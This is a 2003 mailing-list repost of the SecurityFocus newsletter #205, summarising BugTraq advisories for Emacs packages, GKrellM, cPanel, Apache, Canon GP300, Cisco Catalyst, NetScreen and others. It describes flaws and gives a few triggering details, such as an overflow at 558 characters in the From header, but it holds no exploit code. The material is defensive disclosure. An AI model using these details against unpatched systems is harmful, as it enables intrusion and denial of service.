[gull-annonces] Résumé SecurityFocus Newsletter #205
Marc SCHAEFER
schaefer at alphanet.ch
Tue Jul 15 20:11:01 CEST 2003
SEMI/WEMI Insecure Temporary File Creation Vulnerability
BugTraq ID: 8115
Remote: No
Date Published: Jul 07 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8115
Summary:
SEMI is a library used to add MIME features to Emacs. WEMI is a branch of
the SEMI package using widgets.
SEMI/WEMI have been reported prone to an insecure temporary file creation
vulnerability. As a result, it may be possible for local attackers to
corrupt files owned by the user who is invoking a version of Emacs that is
linked to the vulnerable library.
An attacker could potentially exploit this issue by creating a symbolic
link in place of the temporary file that is created by the affected
application. Any actions performed by the vulnerable application when it
is executed will be performed on the linked file.
It should be noted that the impact of this vulnerability might be
exaggerated by the fact that attackers may potentially influence content
that will be added to the target file.
X-Face-EL Insecure Temporary File Creation Vulnerability
BugTraq ID: 8116
Remote: No
Date Published: Jul 07 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8116
Summary:
x-face-el is a decoder for Emacs that decodes images that are included
inline in X-Face email headers.
x-face-el has been reported prone to an insecure temporary file creation
vulnerability. As a result, it may be possible for local attackers to
corrupt files owned by the user who is invoking Emacs and x-face-el.
An attacker could potentially exploit this issue by creating a symbolic
link in place of the temporary file that is created by the affected
application. Any actions performed by the vulnerable application when it
is executed will be performed on the linked file.
It should be noted that the impact of this vulnerability might be
exaggerated by the fact that attackers may potentially influence content
that will be added to the target file.
GKrellM Mailwatch Plugin From Header Remote Buffer Overflow Vulnerability
BugTraq ID: 8118
Remote: Yes
Date Published: Jul 06 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8118
Summary:
GKrellM is the GTK Monitors suite. It is available for the Linux
platform.
It has been reported that the Mailwatch plugin for GKrellM is vulnerable
to a remotely exploitable buffer overflow. This may permit the execution
of arbitrary code with the privileges of the GKrellM program.
The problem is in the handling of long strings contained in the From
header of e-mails. By sending an e-mail with a From header that contains
558 or more characters as the e-mail user name to a user of GKrellM with
the Mailwatch plugin, it is possible to overwrite sensitive process
memory. This vulnerability could be exploited to execute arbitrary
instructions on behalf of the attacker.
CPanel Admin Interface HTML Injection Vulnerability
BugTraq ID: 8119
Remote: Yes
Date Published: Jul 07 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8119
Summary:
cPanel is a multi-platform web hosting control panel that allows a user to
manage their hosted account through a web-based interface. It is
available for Unix and Linux variants.
cPanel is prone to an HTML injection vulnerability. It is possible for
remote attacks to include hostile HTML and script code in requests to
cPanel, which will be logged. When logs are viewed by an administrative
user, the injected code could be rendered in their browser in the context
of the site hosting cPanel. HTML may be injected into the 'Error Log' and
'Latest Visitors' pages. This is due to insufficient sanitization of HTML
and script code when logging client requests.
Exploitation of this issue could permit theft of administrative
cookie-based authentication credentials. The attacker will also be able
to exert control over how affected pages are rendered, which could permit
log spoofing or other attacks.
[ langage indéterminé, licence peu claire ]
Canon GP300 Remote Malformed HTTP Get Denial Of Service Vulnerability
BugTraq ID: 8121
Remote: Yes
Date Published: Jul 07 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8121
Summary:
The GP-300 is a printer and photocopier combination server. It is
distributed and maintained by Canon.
A problem in the Canon GP-300 has been reported in the handling of some
types of web requests. This issue could result in the denial of service
to legitimate users of the print server.
The problem is in the handling of HTTP GET requests. When a malformed
HTTP GET request is issued to the HTTP server deployed on GP-300 servers,
the system reportedly becomes unstable and crashes. A reboot of the
system is required to resume normal operation of the print server.
This problem has been reported to occur when the server is used in
conjunction with WebSpooler v4.5.062.
[ matériel ]
Liece Insecure Temporary File Creation Vulnerability
BugTraq ID: 8124
Remote: No
Date Published: Jul 07 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8124
Summary:
Liece is an Internet Relay Chat client for Emacs.
It has been reported that liece does not create temporary files in a
secure manner. As a result of this, a malicious user may be able to
corrupt arbitrary files in the security context of the user running liece.
It may be possible for the attacker to specify the data to be written,
however, this has not been confirmed. If the attacker can cause custom
data to be written, it may be possible to elevate privileges.
Specific details are not currently available for this vulnerability. This
BID will be updated as more information becomes available.
Mozart Unsafe Mailcap Configuration Vulnerability
BugTraq ID: 8125
Remote: Yes
Date Published: Jul 07 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8125
Summary:
Mozart is a development platform that is based on the Oz language.
When Mozart is installed on the local system, an entry is added to the
mailcap configuration file. This file is used to provide information to
MIME-aware client applications regarding how to handle certain filetypes.
The Mozart package specifies that any Oz filetypes are to be passed to the
Oz interpreter for execution. As a result, any client browsing a web page
or reading an e-mail message may potentially be forced to execute
arbitrary Oz scripts. This could result in execution of malicious code.
Apache Web Server SSLCipherSuite Weak CipherSuite Renegotiation Weakness
BugTraq ID: 8134
Remote: Yes
Date Published: Jul 08 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8134
Summary:
Apache provides directives for supplying cipher suite specifications for
SSL transactions. The cipher suite is negotiated with the client during
the SSL handshake. These directives may be used in a per-directory or
per-server context.
The Apache Software Foundation has reported an issue that may occur when
the SSLCipherSuite directive is used to upgrade a cipher suite.
Particular sequences of per-directory renegotiations may cause a weaker
cipher suite being used in place of the upgraded one.
If this issue were to occur, flaws in weaker ciphersuites could be
exposed. This could threaten the integrity of SSL transactions negotiated
between a vulnerable server and the client. This could provide an
opportunity for passive attackers in a position to observe such a
transaction.
Further technical details are not available at the time of writing. This
BID will be updated appropriately when additional technical information
becomes available.
Apache Web Server Prefork MPM Denial Of Service Vulnerability
BugTraq ID: 8137
Remote: Yes
Date Published: Jul 08 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8137
Summary:
Apache is a freely available web server. It is available for a variety of
platforms including the Unix, Linux and Microsoft Windows operating
systems.
Apache may be run as a non-threaded, pre-forking server via the prefork
MPM (Multi-Processing Module).
The Apache Software Foundation has reported a vulnerability in the prefork
MPM that could result in a temporary denial of service condition. This
condition is known to occur when an accept() call on a rarely accessed
port returns certain errors.
Further technical details are not available at the time of writing. This
BID will be updated appropriately when additional technical information
becomes available.
Apache Web Server Type-Map Recursive Loop Denial Of Service Vulnerability
BugTraq ID: 8138
Remote: No
Date Published: Jul 08 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8138
Summary:
Apache is a freely available web server. It is available for a variety of
platforms including the Unix, Linux and Microsoft Windows operating
systems.
Apache content negotiation functionality reported prone to a denial of
service vulnerability.
The issue may present itself, if an attacker has the ability to create a
malicious type-map file. The attacker may craft the type-map file in a
manner sufficient to cause the vulnerable server to fall into an infinite
loop. It has been reported that the Apache server will exponentially
consume resources in such circumstance. Effectively denying service to
other legitimate system users.
Apache Web Server FTP Proxy IPV6 Denial Of Service Vulnerability
BugTraq ID: 8135
Remote: Yes
Date Published: Jul 08 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8135
Summary:
Apache is a freely available web server. It is available for a variety of
platforms including the Unix, Linux and Microsoft Windows operating
systems.
A denial of service vulnerability has been reported by the vendor to
affect the FTP proxy component of Apache. It has been reported that an
attacker may specify a target server that possesses an IPV6 address. This
may result in a denial of service to other legitimate users. The issue
reportedly presents itself, because the proxy server fails to create an
IPV6 socket.
Explicit technical details regarding this vulnerability are not currently
known, this BID will be updated as further details are disclosed.
Knoppix QT Insecure Temporary File Creation Vulnerability
BugTraq ID: 8139
Remote: No
Date Published: Jul 08 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8139
Summary:
Knoppix is a freely available, open source Linux operating system.
A problem has been identified in Knoppix that may allow an attacker to
exploit the insecure creation of a temporary file. This could result in a
denial of service attack, and potentially an elevation of privileges.
The problem is in the handling of temporary files when the QT libraries
are invoked. KDE is installed by default with Knoppix, and when the
window manager invokes the QT libraries, the libraries create the
predictable library names qt_plugins_3.0rc and qt_plugins_3.0rc.lock, both
with the privileges of the root user.
This problem may affect previous versions of the software.
ZKFingerD Multiple Format String Vulnerabilities
BugTraq ID: 8142
Remote: Yes
Date Published: Jul 08 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8142
Summary:
zkfingerd is a freely available, open source implementation of the RFC1288
protocol. It is available for the Unix and Linux operating systems.
A problem in zkfingerd may make it possible for a remote user to launch a
format string attack against the daemon. This may result in an attacker
gaining unauthorized access to system resources.
The problem is in the 'die.c' source file. Two instances of format string
vulnerabilities exist in the file that may allow an attacker to write to
arbitrary process memory and potentially execute code. Any code executed
through this vulnerability could potentially be carried out with the
privileges of the zkfingerd process.
SKK/DDSKK Insecure Temporary Files Vulnerability
BugTraq ID: 8144
Remote: No
Date Published: Jul 09 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8144
Summary:
skk and ddskk are Kana to Kanji conversion programs for use with Emacs.
They are available for Unix and Linux variants.
skk and ddskk do not create temporary files in a secure manner. This
could permit local attackers to mount file corruption attacks against
sensitive or critical files owned by other users. This would occur in the
context of the user invoking the vulnerable utility. If files can be
corrupted with custom data, this may allow for privilege escalation
attacks. Otherwise, it may be possible to cause a denial of service by
overwriting critical files.
Teapop SQL Injection Vulnerability
BugTraq ID: 8146
Remote: Yes
Date Published: Jul 09 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8146
Summary:
teapop is a POP3 server implementation for Unix and Linux variants.
teapop is prone to an SQL injection vulnerability. This issue occurs in
modules supplied with Teapop that allow authentication via a MySQL or
PostgreSQL database. These modules do not sufficiently sanitize
user-supplied input before it is included in database queries.
Exploitation could allow for SQL queries to be modified, potentially
allowing for unauthorized access, information disclosure or other
consequences. This would occur in the context of the teapop database
user.
TerminatorX Home Environment Variable Buffer Overflow Vulnerability
BugTraq ID: 8147
Remote: No
Date Published: Jul 09 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8147
Summary:
terminatorX is a freely available, open source music manipulation program.
It is available for the Linux platform.
A problem has been reported in terminatorX when processing the HOME
environment variable. Because of this, an attacker may be able to gain
elevated privileges.
The problem is in the handling of long strings. When a large amount of
data is placed in the HOME environment variable, a boundary condition
error occurs that could result in the overwriting of sensitive process
memory. Because of vendor recommendation to install this program with
setuid root privileges, it may be possible for a local user to execute
code with the privileges of the root user.
It should be noted that, by default, terminatorX is not installed with
privileges.
TerminatorX XLocaleDIR Environment Variable Buffer Overflow Vulnerability
BugTraq ID: 8148
Remote: No
Date Published: Jul 09 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8148
Summary:
terminatorX is a freely available, open source music manipulation program.
It is available for the Linux platform.
A problem has been reported in terminatorX when processing the XLOCALEDIR
environment variable. Because of this, an attacker may be able to gain
elevated privileges.
The problem is in the handling of long strings. When a large amount of
data is placed in the XLOCALEDIR environment variable, a boundary
condition error occurs that could result in the overwriting of sensitive
process memory. Because of vendor recommendation to install this program
with setuid root privileges, it may be possible for a local user to
execute code with the privileges of the root user.
It should be noted that, by default, terminatorX is not installed with
privileges.
NetScreen Non-IP Traffic Firewall Bypass Vulnerability
BugTraq ID: 8150
Remote: Yes
Date Published: Jul 09 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8150
Summary:
NetScreen is a line of Internet security appliances integrating firewall,
VPN and traffic management features. ScreenOS is the software used to
manage and configure the firewall. NetScreen supports Microsoft Windows
95, 98, ME, NT and 2000 clients.
It has been alleged that it is possible for remote users to bypass
NetScreen firewalls. Reports have stated that any non-IP or ARP traffic
will bypass the firewall without being logged. Various protocols, such as
SNA, IPX CDP, CDP, and VST may pass through the firewall unnoticed and
without being filtered. This could permit an attacker to interact with
hosts behind the firewall that support these various protocols.
This is reported to occur in 20x and 50x models when run in bridge mode,
though this is not conclusive. This alleged vulnerability has not been
confirmed by Symantec.
[ hardware ]
Cisco Catalyst Non-Standard TCP Flags Remote Denial Of Service Vulnerability
BugTraq ID: 8149
Remote: Yes
Date Published: Jul 09 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8149
Summary:
Catalyst is a network switch hardware and firmware combination maintained
and distributed by Cisco Systems.
A problem with Cisco Catalyst switches has been reported in the handling
of non-standard TCP packets. Because of this, an attacker may be able to
deny legitimate user access to the switch.
The problem is in the handling of TCP packets which have non-standard TCP
flags. Though specific details about this problem are not available, this
likely includes a mixed combination of TCP SYN, FIN, ACK, RST, and URG
flags that do not commonly occur in networks.
When eight of these packets are received by a specific service on the
Catalyst, the service ceases normal operation. To resume normal operation
of these services, the switch requires a reboot.
It should be noted that this vulnerability only affects the services
operating on the switch, and does not affect the switches availability to
handle traffic. This problem affects 4000, 5000, and 6000 series
switches.
[ hardware ]
More information about the gull-annonces
mailing list